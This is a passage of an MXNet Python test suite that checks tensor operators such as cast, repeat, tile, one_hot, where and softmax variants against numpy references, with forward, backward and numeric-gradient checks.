        # check backward: flow gradient is the head gradient rescaled by 2/(dim-1)
        out_grad = np.random.normal(size=(1,2)+target_shape)
        exe.backward(mx.nd.array(out_grad))
        grad_est = np.zeros((1,2)+target_shape)
        grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
        grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
        assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
        # check addto
        exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
        flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
        exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
        exe_add.grad_dict['flow'][:] = flow_grad_npy
        exe_add.forward(is_train=True)
        exe_add.backward(mx.nd.array(out_grad))
        assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
    """batch_take must select element x[i] from row i of a 2-D array."""
    for _ in range(30):
        rows = np.random.randint(1, 100)
        cols = np.random.randint(1, 500)
        mat = mx.random.uniform(-1, 1, shape=(rows, cols), ctx=default_context())
        idx = mx.nd.array(np.random.randint(0, cols, size=rows), ctx=default_context(), dtype='int32')
        picked = mx.nd.batch_take(mat, idx)
        reference = mat.asnumpy()[np.arange(rows), idx.asnumpy()]
        assert_almost_equal(picked.asnumpy(), reference)
@with_seed()
def test_cast():
    """Cast forward converts src->dst dtype; backward converts the head grad back."""
    for src_dt in [np.int32, np.float32, np.float16]:
        for dst_dt in [np.float32, np.int32, np.float16]:
            var = mx.sym.Variable('x', dtype=src_dt)
            cast_sym = mx.sym.Cast(var, dtype=dst_dt)
            executor = cast_sym.simple_bind(ctx=default_context(), x=(10, 10))
            assert executor.arg_arrays[0].dtype == src_dt
            assert executor.outputs[0].dtype == dst_dt
            values = np.random.uniform(-10, 10, size=(10, 10))
            executor.arg_arrays[0][:] = values
            executor.forward(is_train=True)
            executor.backward(mx.nd.array(values, dtype=dst_dt, ctx=default_context()))
            # Forward output must equal numpy's src->dst round trip of the data;
            # backward must deliver the head grad converted dst->src.
            assert_almost_equal(executor.outputs[0].asnumpy(),
                                values.astype(src_dt).astype(dst_dt), rtol=1e-3, atol=1e-5)
            assert_almost_equal(executor.grad_arrays[0].asnumpy(),
                                values.astype(dst_dt).astype(src_dt), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
    """Yield float32-representable test values around every float16 mantissa step.

    Values are generated just below, at, and just above each half-precision
    mantissa increment, across the full float32 exponent range and both signs,
    ending with a single NaN.
    """
    FP16_FRACTION_BITS = 10
    FP32_FRACTION_BITS = 23
    FP32_EXP_MIN = -126
    FP32_EXP_MAX = 127
    steps = 2**(FP16_FRACTION_BITS + 1)
    for sign_bit in (0, 1):
        sign = (-1.0)**sign_bit
        for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
            scale = 2.0**exponent
            for numerator in range(steps):
                fraction = numerator / float(steps)
                # Nudge by one float32 ulp (of 1.0) below/at/above the point.
                for nudge in (-1.0, 0.0, 1.0):
                    delta = nudge / 2**FP32_FRACTION_BITS
                    yield sign * scale * (1.0 + fraction + delta)
    # Final value exercises NaN handling.
    yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
    """mx.sym.Cast and mx.sym.amp_cast fp32->fp16 must match numpy's rounding."""
    input_np = np.array(list(get_cast_op_data())).astype(np.float32)
    # The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
    # as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
    expected_output = input_np.astype(np.float64).astype(np.float16)

    def check_cast(op, input_np, expected_output):
        var = mx.sym.Variable('x', dtype=np.float32)
        casted = op(var, dtype=np.float16)
        ctx = default_context()
        executor = casted.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
        assert executor.arg_arrays[0].dtype == np.float32
        assert executor.outputs[0].dtype == np.float16
        executor.forward(is_train=True)
        model_fp16 = executor.outputs[0].asnumpy()
        for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, model_fp16, expected_output):
            # NaN never compares equal to itself, so accept NaN==NaN explicitly.
            assert (model_fp16_val == np_fp16_val) or \
                   (np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
                   'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
                       fp32_val, model_fp16_val, np_fp16_val)

    check_cast(mx.sym.Cast, input_np, expected_output)
    check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
    """amp_multicast must widen mixed fp16/fp32 inputs to a common float32."""
    x = mx.sym.Variable('x', dtype=np.float16)
    y = mx.sym.Variable('y', dtype=np.float32)
    z = mx.sym.Variable('z', dtype=np.float16)
    ctx = default_context()
    res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
    exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
                         'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
                         'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
    exe.forward(is_train=True)
    # All three outputs must have been promoted to float32.
    for promoted in exe.outputs:
        assert promoted.asnumpy().dtype == np.float32

    def check_amp_multicast(input_np, expected_output):
        # Feed identical values through all three inputs; the first output
        # must equal the expected fp16->fp32 widened values element-wise.
        a = mx.sym.Variable('x', dtype=np.float16)
        b = mx.sym.Variable('y', dtype=np.float32)
        c = mx.sym.Variable('z', dtype=np.float16)
        ctx = default_context()
        multi = mx.sym.amp_multicast(a, b, c, num_outputs=3)
        run = multi.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
                               'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
                               'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
        run.forward(is_train=True)
        sym_output = run.outputs[0].asnumpy()
        for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
            # NaN never compares equal to itself, so accept NaN==NaN explicitly.
            assert (model_fp16_val == np_fp16_val) or \
                   (np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
                   'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
                       fp32_val, model_fp16_val, np_fp16_val)

    input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
    expected_output = input_np.astype(np.float32)
    check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
    """all_finite / multi_all_finite must report 0 when any input holds inf."""
    data = mx.sym.Variable("data", dtype=np.float32)
    data2 = mx.sym.Variable("data2", dtype=np.float32)
    finite_arr = mx.nd.array([[0, 0]])
    inf_arr = mx.nd.array([[np.inf, np.inf]])
    ctx = default_context()

    def evaluate(sym, bindings):
        # Bind, run inference-mode forward, and return the scalar flag.
        executor = sym.bind(ctx, bindings)
        executor.forward(is_train=False)
        return executor.outputs[0].asnumpy()[0]

    single = mx.sym.all_finite(data)
    assert evaluate(single, {'data': inf_arr}) == 0      # inf present -> 0
    assert evaluate(single, {'data': finite_arr}) == 1   # all finite  -> 1

    multi = mx.sym.multi_all_finite(data, data2, num_arrays=2)
    assert evaluate(multi, {'data': finite_arr, 'data2': inf_arr}) == 0
    multi = mx.sym.multi_all_finite(data, data2, num_arrays=2)
    assert evaluate(multi, {'data': finite_arr, 'data2': finite_arr}) == 1
@with_seed()
def test_repeat():
    """Test mx.nd/sym.repeat: forward vs np.repeat, backward, numeric gradient."""
    def test_repeat_forward():
        # Compare mx.nd.repeat against np.repeat, flattened and per-axis.
        ndim_max = 6 # max number of dims of the ndarray
        size_max = 10 # max number of elements in each dim
        repeats = 3
        for ndim in range(1, ndim_max+1):
            shape = ()
            for i in range(0, ndim):
                shape += (np.random.randint(1, size_max+1), )
            a = np.random.random_sample(size=shape)
            aa = np.repeat(a, repeats)
            b = mx.nd.array(a, ctx=default_context())
            bb = mx.nd.repeat(b, repeats).asnumpy()
            assert_almost_equal(aa, bb)
            for axis in range(0, ndim):
                aa = np.repeat(a, repeats, axis)
                bb = mx.nd.repeat(b, repeats, axis).asnumpy()
                assert_almost_equal(aa, bb)

    def test_repeat_backward(axis):
        # The gradient of repeat sums the head gradient over each group of
        # `repeats` consecutive output entries along `axis`.
        data = mx.sym.Variable('data')
        n1 = 3
        n2 = 4
        shape = (n1, n2)
        data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
        arr_data = mx.nd.array(data_tmp)
        arr_grad = mx.nd.empty(shape)
        repeats = 2
        test = mx.sym.repeat(data, repeats=repeats, axis=axis)
        exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
        npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
        if axis == 0:
            npout_grad = npout_grad.reshape(n1 * repeats, n2)
        elif axis == 1:
            npout_grad = npout_grad.reshape(n1, n2 * repeats)
        else:
            raise RuntimeError("Invalid axis value")
        out_grad = mx.nd.array(npout_grad)
        exe.backward(out_grad)
        expected_grad = np.zeros(shape)
        # Hand-build the expected gradient by summing each repeated group.
        if axis == 0:
            for i in range(shape[0]):
                for j in range(shape[1]):
                    k = i * repeats
                    expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
        elif axis == 1:
            for j in range(shape[1]):
                for i in range(shape[0]):
                    k = j * repeats
                    expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
        else:
            raise RuntimeError("Invalid axis value")
        assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)

    def test_repeat_numeric_gradient():
        # Finite-difference gradient check on a small fixed shape.
        data = mx.sym.Variable('data')
        n1 = 3
        n2 = 4
        shape = (n1, n2)
        data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
        repeats = 2
        test = mx.sym.repeat(data, repeats=repeats, axis=0)
        check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)

    test_repeat_forward()
    test_repeat_backward(axis=0)
    test_repeat_backward(axis=1)
    test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
    """reverse on axes 1 and 2 must match numpy ::-1 slicing, forward and backward."""
    data = mx.symbol.Variable('data')
    shape = (5, 5, 5)
    data_np = np.random.uniform(-1, 1, shape)
    sym = mx.sym.reverse(data, axis=[1, 2])
    head_grad = np.random.uniform(-1, 1, shape)
    check_numeric_gradient(sym, [data_np], numeric_eps=2E-2)
    check_symbolic_forward(sym, [data_np], [data_np[:, ::-1, ::-1]])
    # Backward of reverse is reverse of the head gradient.
    check_symbolic_backward(sym, [data_np], [head_grad], [head_grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
    """Test mx.nd/sym.tile: forward vs np.tile, empty cases, backward, errors."""
    def test_normal_case():
        # Random shapes and rep tuples; forward must match np.tile exactly.
        ndim_min = 1
        ndim_max = 5 # max number of dims of the ndarray
        size_max = 10 # max number of elements in each dim
        length_max = 3 # max length of reps
        rep_max = 10 # max number of tiling in each dim
        for ndim in range(ndim_min, ndim_max+1):
            shape = []
            for i in range(1, ndim+1):
                shape.append(np.random.randint(1, size_max+1))
            shape = tuple(shape)
            a = np.random.randint(0, 100, shape)
            b = mx.nd.array(a, dtype=a.dtype)
            reps_len = np.random.randint(1, length_max+1)
            reps_tuple = ()
            # NOTE(review): range starts at 1, so reps holds reps_len-1 entries
            # and is empty when reps_len == 1 — possibly intended to also hit
            # the empty-reps case, possibly an off-by-one; confirm upstream.
            for i in range(1, reps_len):
                reps_tuple += (np.random.randint(1, rep_max), )
            reps_array = np.asarray(reps_tuple)
            a_tiled = np.tile(a, reps_array)
            b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
            assert same(a_tiled, b_tiled)

    def test_empty_tensor():
        # Tiling a zero-size tensor must stay consistent with numpy.
        shape = (2, 3, 0, 4)
        a = np.array([], dtype=np.int32).reshape(shape)
        b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
        reps = (2, 4, 6)
        a_tiled = np.tile(a, reps)
        b_tiled = mx.nd.tile(b, reps).asnumpy()
        assert same(a_tiled, b_tiled)

    def test_empty_reps():
        # An empty reps tuple leaves the array unchanged.
        a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
        b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
        a_tiled = np.tile(a, ())
        b_tiled = mx.nd.tile(b, ()).asnumpy()
        assert same(a_tiled, b_tiled)

    def test_tile_backward():
        # Gradient of tile sums the head gradient over all tiled copies.
        data = mx.sym.Variable('data')
        n1 = 2
        n2 = 2
        shape = (n1, n2)
        data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
        arr_data = mx.nd.array(data_tmp)
        arr_grad = mx.nd.empty(shape)
        reps1 = 2
        reps2 = 2
        reps = (reps1, reps2)
        test = mx.sym.tile(data, reps=reps)
        exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
        npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
        out_grad = mx.nd.array(npout_grad)
        exe.backward(out_grad)
        expected_grad = np.zeros(shape)
        for i in range(shape[0]):
            for j in range(shape[1]):
                # the strided slice picks element (i, j) out of every tile copy
                expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
        assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)

    def test_tile_numeric_gradient():
        # Finite-difference gradient check on a small fixed shape.
        data = mx.sym.Variable('data')
        n1 = 2
        n2 = 2
        shape = (n1, n2)
        data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
        reps1 = 2
        reps2 = 2
        reps = (reps1, reps2)
        test = mx.sym.tile(data, reps=reps)
        check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)

    def test_invalid_reps():
        # Negative or zero repetition counts must raise MXNetError.
        data = mx.nd.arange(16).reshape((4, 4))
        assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
        assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))

    test_normal_case()
    # zero-size dims need numpy-shape semantics
    with mx.np_shape():
        test_empty_tensor()
    test_empty_reps()
    test_tile_backward()
    test_tile_numeric_gradient()
    test_invalid_reps()
@with_seed()
def test_one_hot():
    """Test mx.nd.one_hot against a handcrafted numpy reference."""
    def test_normal_case(index_type=np.int32):
        # Random-rank index arrays; out-of-range indices must yield all-off rows.
        ndim_max = 6
        dim_size_max = 20
        depth = int(dim_size_max / 2)
        on_value = 1
        off_value = 0
        for ndim in range(1, ndim_max+1):
            shape = ()
            for i in range(1, ndim+1):
                shape += (np.random.randint(1, dim_size_max+1), )
            indices = np.random.randint(-dim_size_max, dim_size_max+1,
                                        size=np.prod(shape)).reshape(shape)
            mx_one_hot_array = mx.nd.one_hot(
                mx.nd.array(indices, ctx=default_context(), dtype=index_type),
                depth=depth, dtype=np.int32)
            # Build the expected result row by row over the flattened indices;
            # indices outside [0, depth) leave their row entirely off.
            expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
            expected_array[:] = off_value
            indices_1d = indices.flatten()
            row = 0
            for idx in indices_1d:
                if 0 <= idx < depth:
                    expected_array[row, idx] = on_value
                row += 1
            expected_array = expected_array.reshape(shape + (depth, ))
            one_hot_array = mx_one_hot_array.asnumpy()
            assert same(expected_array, one_hot_array)

    def test_empty_indices():
        # A zero-size index tensor yields a zero-size one-hot tensor.
        shape = (2, 0, 9, 3)
        indices = np.array([]).reshape(shape)
        depth = 10
        mx_one_hot_array = mx.nd.one_hot(
            mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
            depth=depth, dtype=np.int32).asnumpy()
        expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
        assert same(expected_array, mx_one_hot_array)

    def test_zero_depth():
        # depth == 0 yields a trailing zero-length axis.
        shape = (2, 4, 9, 3)
        indices = np.ones(shape)
        depth = 0
        mx_one_hot_array = mx.nd.one_hot(
            mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
            depth=depth, dtype=np.int32).asnumpy()
        expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
        assert same(expected_array, mx_one_hot_array)

    test_normal_case(index_type=np.int32)
    test_normal_case(index_type=np.float64)
    test_normal_case(index_type=np.float32)
    test_normal_case(index_type=np.float16)
    # zero-size dims need numpy-shape semantics
    with mx.np_shape():
        test_empty_indices()
        test_zero_depth()
@with_seed()
def test_where():
    """Test mx.sym/nd.where: forward, backward (write/add), shape errors.

    Fixes a vacuous assertion in test_1d_cond: the original compared
    ``expect_out.all() == out.all()`` — the truthiness of each whole array —
    which passes for any pair of all-nonzero arrays. It now compares the
    arrays element-wise.
    """
    def get_forward_expected_output(condition, x, y):
        # numpy reference: condition either matches x element-wise, or is a
        # length-batch vector that selects whole rows.
        original_shape = x.shape
        out = np.zeros(original_shape)
        if condition.shape == x.shape:
            for index, c in np.ndenumerate(condition):
                if c != 0:
                    out[index] = x[index]
                else:
                    out[index] = y[index]
        elif condition.shape == (x.shape[0], ):
            s = x.shape
            m = s[0]
            n = int(np.prod(s)/s[0])
            x2d = x.reshape((m, n))
            y2d = y.reshape((m, n))
            out = out.reshape((m, n))
            for i in range(0, m):
                if condition[i] != 0:
                    for j in range(0, n):
                        out[i, j] = x2d[i, j]
                else:
                    for j in range(0, n):
                        out[i, j] = y2d[i, j]
        else:
            raise RuntimeError("Invalid condition shape for where op")
        out = out.reshape(original_shape)
        return out

    def get_forward_inputs_same_shape(shape):
        # x in [1, 6), y in [7, 11): disjoint ranges make selection visible.
        condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
        x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
        y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
        return condition_np, x_np, y_np

    def get_forward_inputs_condition_vector(shape):
        # 1-D condition of length shape[0] selects whole leading slices.
        condition_np = np.random.randint(0, 2, shape[0])
        x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
        y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
        return condition_np, x_np, y_np

    def get_backward_input(shape):
        return np.random.randint(20, 30, np.prod(shape)).reshape(shape)

    def get_backward_expected_outputs(grad_in, condition):
        # where() routes the head gradient to x where condition holds and to y
        # otherwise; condition itself receives zero gradient.
        shape = grad_in.shape
        grad_cond = np.zeros(condition.shape)
        grad_x = np.empty(shape)
        grad_y = np.empty(shape)
        for index, c in np.ndenumerate(condition):
            if 0 != c:
                grad_x[index] = grad_in[index]
                grad_y[index] = 0
            else:
                grad_x[index] = 0
                grad_y[index] = grad_in[index]
        return grad_cond, grad_x, grad_y

    def test_where_helper(shape, same_shape):
        # End-to-end check of forward and backward for both grad_req modes.
        if same_shape:
            condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
        else:
            condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
        out_expected = get_forward_expected_output(condition_np, x_np, y_np)
        grad_in_np = get_backward_input(shape)
        grad_expected_cond, grad_expected_x, grad_expected_y\
            = get_backward_expected_outputs(grad_in_np, condition_np)
        condition = mx.sym.Variable('condition')
        x = mx.sym.Variable('x')
        y = mx.sym.Variable('y')
        grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
        where_sym = mx.sym.where(condition, x, y)
        # test req='write'
        where_exe_write = where_sym.simple_bind(ctx=default_context(),
                                                condition=condition_np.shape,
                                                x=x_np.shape, y=y_np.shape,
                                                grad_req='write')
        # test forward req='write'
        outputs = where_exe_write.forward(is_train=True, condition=condition_np,
                                          x=x_np, y=y_np)
        assert same(outputs[0].asnumpy(), out_expected)
        # test backward req='write'
        where_exe_write.backward(grad_in_mx)
        assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
        assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
        assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
        # test req='add': gradients must accumulate onto pre-filled buffers
        x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
        y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
        where_exe_add = where_sym.simple_bind(ctx=default_context(),
                                              condition=condition_np.shape,
                                              x=x_np.shape, y=y_np.shape,
                                              grad_req='add')
        where_exe_add.grad_dict['x'][:] = x_grad_init
        where_exe_add.grad_dict['y'][:] = y_grad_init
        # test forward req='add'
        outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
        assert same(outputs[0].asnumpy(), out_expected)
        # test backward req='add'
        where_exe_add.backward(grad_in_mx)
        x_ograd = where_exe_add.grad_dict['x'].asnumpy()
        y_ograd = where_exe_add.grad_dict['y'].asnumpy()
        assert same(x_ograd, grad_expected_x+x_grad_init)
        assert same(y_ograd, grad_expected_y+y_grad_init)

    def test_where_numeric_gradient(shape, same_shape):
        # Finite-difference check on x and y only (condition is not differentiable).
        condition = mx.sym.Variable('condition')
        x = mx.sym.Variable('x')
        y = mx.sym.Variable('y')
        where_sym = mx.sym.where(condition, x, y)
        if same_shape:
            condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
        else:
            condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
        check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])

    def test_invalid_shape():
        # A condition whose length matches neither x nor x.shape[0] must raise.
        condition = mx.sym.Variable('condition')
        x = mx.sym.Variable('x')
        y = mx.sym.Variable('y')
        where_sym = mx.sym.where(condition, x, y)
        assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
                                                y=mx.nd.array([[8,9],[10,11],[12,13]]),
                                                condition=mx.nd.array([1,0])), MXNetError)
        assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
                                             y=mx.nd.array([[8,9],[10,11],[12,13]]),
                                             condition=mx.nd.array([1,0])), MXNetError)

    def test_1d_cond():
        # A 1-D condition selects whole rows from x or y.
        cond = mx.nd.array([1, 0, 1])
        x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
        y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
        expect_out = np.array([[2, 3], [9, 10], [6, 7]])
        out = mx.nd.where(cond, x, y).asnumpy()
        # BUG FIX: compare element-wise. The previous
        # `assert(expect_out.all() == out.all())` compared only the arrays'
        # truthiness and could not detect a wrong result.
        assert same(expect_out, out)

    test_where_helper((5, 9), True)
    test_where_helper((5, 9), False)
    test_where_helper((5, 7, 9), True)
    test_where_helper((5, 7, 9), False)
    test_where_helper((10, 8, 15, 3), True)
    test_where_helper((10, 8, 15, 3), False)
    test_where_numeric_gradient((5, 9), True)
    test_where_numeric_gradient((5, 9), False)
    test_where_numeric_gradient((5, 7, 9), True)
    test_where_numeric_gradient((5, 7, 9), False)
    test_invalid_shape()
    test_1d_cond()
@with_seed()
def test_softmin():
    """softmin must equal softmax of the negated input, forward and backward."""
    for rank in range(1, 5):
        for dt in [np.float16, np.float32, np.float64]:
            is_fp16 = dt is np.float16
            # Looser tolerances for half precision.
            rtol, atol = (1e-2, 5e-3) if is_fp16 else (1e-3, 1e-3)
            shape = np.random.randint(1, 5, size=rank)
            ax = np.random.randint(-rank, rank)
            inp = np.random.uniform(-2, 2, size=shape).astype(dt)
            if is_fp16:
                inp = inp / 10  # keep fp16 values well-conditioned
            sym = mx.sym.softmin(axis=ax)
            ref_out = np_softmax(-inp, axis=ax)
            ref_grad = np.zeros(shape)  # uniform head grad => zero input grad
            check_symbolic_forward(sym, [inp], [ref_out], atol=atol, dtype=dt)
            for req in ['null', 'add', 'write']:
                check_symbolic_backward(sym, [inp], [np.ones(ref_out.shape)], [ref_grad],
                                        rtol=rtol, atol=atol, grad_req=req, dtype=dt)
            if not is_fp16:
                check_numeric_gradient(sym, [inp], rtol=rtol, atol=atol, dtype=dt)
@with_seed()
def test_new_softmax():
    """softmax over a random axis must match np_softmax; uniform grad backprops to zero."""
    for rank in range(1, 5):
        shape = np.random.randint(1, 5, size=rank)
        ax = np.random.randint(-rank, rank)
        inp = np.random.uniform(-2, 2, size=shape)
        sym = mx.sym.softmax(axis=ax)
        ref_out = np_softmax(inp, axis=ax)
        ref_grad = np.zeros(shape)  # uniform head grad => zero input grad
        check_symbolic_forward(sym, [inp], [ref_out])
        for req in ['null', 'add', 'write']:
            check_symbolic_backward(sym, [inp], [np.ones(ref_out.shape)], [ref_grad],
                                    rtol=1e-2, atol=1e-3, grad_req=req)
        check_numeric_gradient(sym, [inp], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
    """Temperature-scaled softmax must match the numpy reference for T = 1..10."""
    for rank in range(1, 5):
        shape = np.random.randint(1, 5, size=rank)
        inp = np.random.uniform(-2, 2, size=shape)
        for temp in range(1, 11):
            sym = mx.sym.softmax(axis=0, temperature=temp)
            ref_out = np_softmax(inp, axis=0, temperature=temp)
            ref_grad = np.zeros(shape)  # uniform head grad => zero input grad
            check_symbolic_forward(sym, [inp], [ref_out], rtol=0.05, atol=1e-3)
            check_symbolic_backward(sym, [inp], [np.ones(shape)], [ref_grad], rtol=0.05, atol=1e-3)
            check_numeric_gradient(sym, [inp], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
    """log_softmax (addressed via a negative axis) must equal log(np_softmax)."""
    for rank in range(1, 5):
        for _ in range(5):
            shape = np.random.randint(1, 5, size=rank)
            ax = np.random.randint(0, rank)
            inp = np.random.uniform(-2, 2, size=shape)
            # ax - rank exercises negative-axis handling in the operator.
            sym = mx.sym.log_softmax(axis=ax - rank)
            # The 1e-20 epsilon guards the reference against log(0).
            check_symbolic_forward(sym, [inp], [np.log(np_softmax(inp, axis=ax) + 1e-20)])
            check_numeric_gradient(sym, [inp], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
    """softmax must stay finite for inputs at the float32 magnitude extremes."""
    def run_case(input_nd, truth):
        data = mx.sym.Variable('data')
        sm = data.softmax(axis=1)
        runner = sm.bind(default_context(), args={'data': input_nd})
        runner.forward()[0].wait_to_read()
        observed = runner.outputs[0][0][0][0].asnumpy()
        assert_almost_equal(observed, truth, rtol=1e-5, atol=1e-5)

    # axis 1 has size 1, so each output element must be exactly 1.0
    run_case(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
    run_case(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
    run_case(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
    run_case(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
    """Low-precision softmax-family outputs/grads must track a higher-precision run."""
    def check_dtypes_almost_equal(op_name,
                                  atol, rtol,
                                  grad_atol, grad_rtol,
                                  idtype, ref_dtype, odtype=None):
        # Same data in two input dtypes: forward outputs and input gradients
        # must agree within the given tolerances.
        op = getattr(mx.nd, op_name)
        base = mx.random.uniform(shape=(100, 500))
        lo = base.astype(idtype)
        hi = base.astype(ref_dtype)
        lo.attach_grad()
        hi.attach_grad()
        with mx.autograd.record():
            lo_out = op(lo, axis=-1, dtype=odtype)
            hi_out = op(hi, axis=-1, dtype=odtype)
        assert_almost_equal(lo_out.asnumpy(), hi_out.asnumpy(), rtol=rtol, atol=atol)
        lo_out.backward()
        hi_out.backward()
        assert_almost_equal(lo.grad.asnumpy(), hi.grad.asnumpy(),
                            rtol=grad_rtol, atol=grad_atol)

    import sys
    is_windows = sys.platform.startswith('win')
    enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
    if not is_windows or enforce_safe_acc == "1":
        # Safe accumulation is needed for the fp16 cases to meet tolerance.
        os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
        # (op, tolerance for the fp16/fp32 pair, tolerance for the fp32/fp64 pair)
        for op_name, tol16, tol32 in (('softmax', 1e-5, 1e-5),
                                      ('softmin', 1e-5, 1e-5),
                                      ('log_softmax', 1e-2, 1e-3)):
            check_dtypes_almost_equal(op_name, tol16, tol16, tol16, tol16, 'float16', 'float32')
            check_dtypes_almost_equal(op_name, tol16, tol16, tol16, tol16, 'float16', 'float32', 'float32')
            check_dtypes_almost_equal(op_name, tol32, tol32, tol32, tol32, 'float32', 'float64')
            check_dtypes_almost_equal(op_name, tol32, tol32, tol32, tol32, 'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
    """softmax(use_length=True) must normalize only the first `length` entries on axis 1."""
    def np_softmax_with_length(data, length):
        # Reference: per (i, j), softmax over data[i, :len, j]; zeros beyond len.
        res = np.zeros(data.shape)
        for i in range(length.shape[0]):
            for j in range(length.shape[1]):
                leng = int(length[i, j])
                res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
        return res

    ndim = 3
    shape = rand_shape_nd(ndim, dim=10)
    reduced = list(shape)
    del reduced[1]  # length tensor drops the softmax axis (axis 1)
    len_shape = tuple(reduced)
    for dtype in [np.float16, np.float32, np.float64]:
        mx_data = rand_ndarray(shape, dtype=dtype)
        np_data = mx_data.asnumpy()
        np_length = np.random.randint(1, shape[1] + 1, len_shape)
        mx_length = mx.nd.array(np_length, dtype=np.int32)
        np_out = np_softmax_with_length(np_data, np_length)
        data = mx.sym.Variable("data")
        length = mx.sym.Variable("length")
        mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
        location = {"data": mx_data, "length": mx_length}
        rtol = 1e-2 if dtype == np.float16 else 1e-3
        atol = 1e-4 if dtype == np.float16 else 1e-5
